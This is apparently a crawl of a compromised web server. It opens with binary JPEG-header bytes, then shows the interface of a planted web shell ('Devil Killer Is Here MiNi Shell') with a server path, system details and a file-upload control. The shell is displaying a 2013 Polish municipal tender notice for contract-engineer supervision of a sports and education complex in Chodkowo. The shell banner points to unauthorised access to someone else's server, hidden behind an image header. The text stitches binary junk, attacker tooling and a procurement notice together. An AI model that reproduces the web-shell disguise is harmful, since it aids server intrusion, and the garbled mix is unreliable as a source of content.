JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130920/383678-N-2013.html

<p class="kh_header"><b>Bodzanów: Pełnienie funkcji Inżyniera Kontraktu w trakcie realizacji i w okresie gwarancji po wykonaniu robót budowlanych realizowanych w ramach zadania: Budowa kompleksu sportowo-oświatowego wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu w miejscowości Chodkowo - etap I</b><br>
<b>Numer ogłoszenia: 383678 - 2013; data zamieszczenia: 20.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Bodzanów , ul. Bankowa 7, 09-470 Bodzanów, woj. mazowieckie, tel. 24 2607006 w. 30, faks 24 2607065.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bodzanow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu w trakcie realizacji i w okresie gwarancji po wykonaniu robót budowlanych realizowanych w ramach zadania: Budowa kompleksu sportowo-oświatowego wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu w miejscowości Chodkowo - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu funkcji Inżyniera Kontraktu w trakcie realizacji i w okresie gwarancji po wykonaniu robót budowlanych realizowanych w ramach przedsięwzięcia pn. Budowa kompleksu sportowo-oświatowego wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu 
w miejscowości Chodkowo - etap I. Szczegółowy przedmiot zamówienia obejmuje: 
1)	prowadzenie nadzoru inwestorskiego zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.);
2)	sprawdzenie kompletności dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych na potrzeby przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane dla projektu dot. Budowa kompleksu sportowo-oświatowego wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu w miejscowości Chodkowo - etap I, zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego z dnia 2 września 2004 r. (Dz.U. Nr 202, poz. 2072 z późn. zm.)
3)	przeprowadzenie inspekcji terenu budowy w celu sprawdzenia zgodności stanu istniejącego z dokumentacją projektową;
4)	ścisłą współpracę z Zamawiającym w trakcie realizacji inwestycji;
5)	przekazanie wykonawcy terenu budowy przy udziale Zamawiającego;
6)	zawiadomienie właściwych organów co najmniej na 7 dni przed rozpoczęciem robót, 
o zamiarze rozpoczęcia robót budowlanych wraz z pisemnym oświadczeniem kierownika budowy i inspektora nadzoru o przyjęciu obowiązków;
7)	przekazanie wykonawcy robót zarejestrowanego dziennika budowy;
8)	uczestniczenie w przygotowaniu uzupełniającej dokumentacji projektowo-kosztorysowej, niezbędnej do prawidłowego wykonania inwestycji;
9)	uzgodnienie z Zamawiającym wzorów wszystkich dokumentów, które będą miały zastosowanie w trakcie realizacji inwestycji;
10)	dokonanie oceny harmonogramu rzeczowo-finansowego i przedłożenie jej Zamawiającemu w terminie 10 dni od dnia otrzymania harmonogramu od Wykonawcy robót;
11)	weryfikację i zatwierdzanie, po uprzednim zaopiniowaniu przez nadzór autorski, rysunków wykonawczych sporządzanych przez Wykonawcę robót;
12)	powiadamianie Zamawiającego o rozbieżności pomiędzy dokumentacją projektową 
a stanem faktycznym na terenie budowy;
13)	monitorowanie postępu w realizacji inwestycji zgodnie ze zweryfikowaną dokumentacją projektową, specyfikacjami technicznymi, pozwoleniem na budowę, przepisami i obowiązującymi normami oraz zasadami wiedzy technicznej oraz zatwierdzonym harmonogramem rzeczowo-finansowym;
14)	informowanie Zamawiającego o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu ich wykonania lub zwiększenie kosztów;
15)	kontrolę posiadania odpowiednich kwalifikacji oraz uprawnień do prowadzenia robót budowlanych przez osoby zatrudnione przez wykonawcę;
16)	kontrolę wszystkich używanych urządzeń i materiałów pod względem posiadania wymaganych świadectw i certyfikatów;
17)	sprawdzanie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu;
18)	potwierdzanie i sprawdzanie stanu zapewnienia odpowiedniego dla wykonywanych robót sprzętu na terenie budowy;
19)	sprawowanie kontroli nad sposobem składowania i przechowywania materiałów;
20)	zatwierdzanie dostaw wykonawcy przed ich wbudowaniem oraz sprawdzanie ich autentyczności, kompletności, prawidłowości oraz formułowanie zaleceń dotyczących wszelkich certyfikatów, atestów, dokumentów jakości, aprobat, deklaracji zgodności, gwarancji, praw własności itp.;
21)	wykonywanie dokumentacji fotograficznej na terenie budowy, z uwzględnieniem poszczególnych elementów robót budowlanych oraz dokumentowanie fotograficzne czynności odbiorowych;
22)	archiwizowanie dokumentacji fotograficznej za pomocą zdjęć w formie cyfrowej, opatrzonych pisemnym komentarzem dotyczącym etapu robót, ich prawidłowości i terminowości;
23)	opiniowanie proponowanych podwykonawców robót;
24)	sprawdzanie i wnioskowanie o uaktualnienie harmonogramu rzeczowo-finansowego inwestycji;
25)	bieżące kontrolowanie postępu wykonania robót w stosunku do zatwierdzonego harmonogramu rzeczowo-finansowego;
26)	składanie Zamawiającemu comiesięcznych sprawozdań z przebiegu realizacji zadania, począwszy od następnego miesiąca kalendarzowego po rozpoczęciu robót budowlanych;
27)	organizowanie i prowadzenie narad technicznych i innych spotkań z udziałem przedstawicieli Zamawiającego, wykonawcy robót budowlanych i w razie potrzeby projektanta, które będą odbywały się nie rzadziej niż raz na miesiąc w siedzibie Zamawiającego;
28)	udzielanie regularnych konsultacji i doradztwa technicznego Zamawiającemu;
29)	rozpoznawanie w uzgodnieniu z Zamawiającym wszelkiego rodzaju skarg i roszczeń osób trzecich, związanych z realizacją inwestycji;
30)	przeprowadzanie regularnych inspekcji placu budowy;
31)	sprawdzanie i opiniowanie wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót w stosunku do dokumentacji projektowej (roboty zamienne) oraz 
w sprawie robót uzupełniających i dodatkowych, a także ustalenia sposobu wykonania tych robót;
32)	w przypadku wystąpienia konieczności wykonania robót dodatkowych lub uzupełniających uzgadnianie sposobu postępowania z Zamawiającym i wykonawcą robót oraz przygotowanie dokumentacji niezbędnej dla przeprowadzenia procedur udzielenia zamówień dodatkowych lub uzupełniających zgodnie z ustawą PZP i udział w tych postępowaniach;
33)	sprawdzanie kosztorysów przedkładanych przez wykonawcę robót;
34)	zawiadamianie Zamawiającego oraz nadzoru autorskiego o stwierdzonych w trakcie realizacji robót usterkach, rozbieżnościach i wadach dokumentacji oraz dokonywanie stosownych uzgodnień lub wyjaśnień w tym zakresie;
35)	sprawdzanie jakości wykonywanych robót i wbudowanych elementów budowlanych; 
36)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających oraz uczestniczenie w odbiorach częściowych;
37)	wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy, dotyczących: wykonania prób, odkrycia robót lub elementów zakrytych, wymagających odkrycia oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania 
w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
38)	egzekwowanie od wykonawcy dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania ich dalszego wykonywania 
w przypadku, gdy ich kontynuacja mogłaby wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;
39)	zawieszanie robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi, bądź spowodować znaczne straty materialne;
40)	zatwierdzanie poprawek do dokumentacji projektowej w uzgodnieniu z Zamawiającym oraz po uzyskaniu stosownych uzgodnień z projektantem;
41)	weryfikacja i zatwierdzanie do zapłaty faktur wystawionych przez wykonawcę robót w związku z realizacją umowy na roboty budowlane;
42)	nadzorowanie wszystkich prób i uczestniczenie w odbiorach technicznych instalacji, urządzeń technicznych, przewodów kominowych oraz odbiorach gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
43)	uzgadnianie z wykonawcą robót rodzaju dokumentacji powykonawczej oraz nadzorowanie kompletności i poprawności sporządzenia przez kierownika budowy dokumentacji powykonawczej oraz sprawdzenie jej i zatwierdzenie w porozumieniu z Zamawiającym;
44)	egzekwowanie od wykonawcy robót przekazania Zamawiającemu instrukcji eksploatacji i konserwacji urządzeń;
45)	zarządzanie całym procesem przekazania obiektu do użytkowania oraz złożenie w WINB wniosku o pozwolenie na użytkowanie obiektu;
46)	dokonanie końcowego rozliczenia kontraktu;
47)	pisemne opiniowanie na żądanie Zamawiającego niedotrzymania terminu wykonania robót z winy wykonawcy robót, stanowiące podstawę dochodzenia odszkodowania za opóźnienie oraz odszkodowania uzupełniającego przenoszącego wysokość kar umownych;
48)	przeprowadzanie w okresie gwarancji na roboty budowlane przeglądów obiektu budowlanego przy udziale wykonawcy robót, Zamawiającego i użytkowników wraz ze spisaniem protokołu, określającego stwierdzone wady i usterki, sposób oraz termin ich usunięcia;
49)	opracowywanie opinii dotyczących wad i usterek inwestycji;
50)	nadzorowanie prawidłowości usunięcia wad i usterek przez wykonawcę robót oraz kontrola ich usunięcia wraz ze spisaniem protokołu z usunięcia wad i usterek;
51)	przygotowywanie danych niezbędnych do naliczania kar umownych z tytułu opóźnień, w tym opóźnień w usunięciu wad i usterek;
52)	przygotowanie danych niezbędnych do przeprowadzenia postępowania przetargowego na wybór wykonawcy zastępczego do usunięcia wad i usterek w przypadku nieusunięcia wad i usterek przez dotychczasowego wykonawcę robót oraz nadzór nad tymi pracami 
i dokonanie ich odbioru;
53)	wykonywanie wszelkich czynności, niewymienionych w umowie, które są niezbędne dla prawidłowej realizacji inwestycji;
54)	zawiadamianie organu nadzoru o zmianach na stanowisku kierownika budowy, inspektorów nadzoru;
55)	kontrolowanie prawidłowości prowadzenia dziennika budowy, a po odbiorze robót - odebranie dziennika budowy od kierownika budowy;
56)	dobór odpowiedniego zespołu nadzoru inwestorskiego oraz zapewnienie czasowego zastępstwa specjalistów na cały czas ich nieobecności z przyczyn losowych;
57)	uczestniczenie w spotkaniach i naradach organizowanych przez różne instytucje w sprawie budowy, w tym udział w razie potrzeby w sesjach Rady Gminy Bodzanów;
58)	w przypadku przerwania robót wykonywanie wszelkich czynności związanych z tym przerwaniem, w tym nadzór nad przejęciem terenu budowy, nad robotami zabezpieczającymi itp.;
59)	zweryfikowanie i pisemne zatwierdzenie obmiarów robót wykonanych przez wykonawcę robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>pełnienie nadzoru inwestorskiego nad robotami budowlanymi związanymi z wykonaniem kanalizacji deszczowej kompleksu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.40.00-0, 71.24.70.00-1, 71.24.80.00-8, 71.31.00.00-4, 71.52.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.03.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium ustala się na kwotę 2.500,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca usługi przedstawi wykaz wykonanych i prawidłowo ukończonych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usług polegających na pełnieniu funkcji inżyniera kontraktu lub pełnieniu nadzoru inwestorskiego przy budowie lub przebudowie obiektu budowlanego użyteczności publicznej o wartości robót budowlanych minimum 1 000.000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada osoby zdolne do wykonania zamówienia, tj. dysponuje Inżynierem Koordynatorem do realizacji kontraktu na roboty budowlane, który posiada wykształcenie wyższe techniczne, uprawnienia budowlane bez ograniczeń w branży konstrukcyjno-budowlanej, doświadczenie na stanowisku kierownika budowy lub koordynatora nadzoru inwestorskiego nad robotami budowlanymi lub Inżyniera Kontraktu w odniesieniu do wykonywanych w okresie ostatnich trzech lat przed upływem terminu do składania ofert co najmniej dwóch inwestycji polegających na budowie albo przebudowie obiektu budowlanego użyteczności publicznej o wartości robót budowlanych minimum 1 000 000,00 zł brutto każda; Inspektorem nadzoru inwestorskiego o specjalności konstrukcyjno-budowlanej, który posiada uprawnienia budowlane bez ograniczeń o specjalności konstrukcyjno-budowlanej; Inspektorem nadzoru inwestorskiego o specjalności instalacyjnej, który posiada uprawnienia budowlane bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; Inspektorem nadzoru inwestorskiego o specjalności instalacji elektrycznych, który musi posiadać uprawnienia budowlane bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych; Inspektorem nadzoru inwestorskiego o specjalności drogowej, który posiada  uprawnienia budowlane w specjalności drogowej w ograniczonym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli Inżynier Kontraktu wykaże osiągnięcie obrotu w wysokości 300.000,00 zł łącznie w okresie ostatnich trzech lat obrotowych oraz będzie posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 500.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe oświadczenia i dokumenty wymagane od wykonawcy: 1) wypełniony formularz ofertowy stanowiący załącznik Nr 1 do SIWZ, 2) dowód wniesienia wadium, 3) pełnomocnictwo zgodnie z art. 23 ust. 2 Pzp w przypadku składania oferty przez wykonawców usługi ubiegających się wspólnie o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	osób pełniących funkcje, o których mowa w rozdziale VI.1.2 SIWZ.
2)	wynagrodzenia brutto Wykonawcy w razie zmiany stawki podatku VAT dla usługi objętej przedmiotem zamówienia,
3)	formy zabezpieczenia należytego wykonania umowy,
4)	rozszerzenia odpowiedzialności z tytułu rękojmi i przedłużenia terminu udzielonej gwarancji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
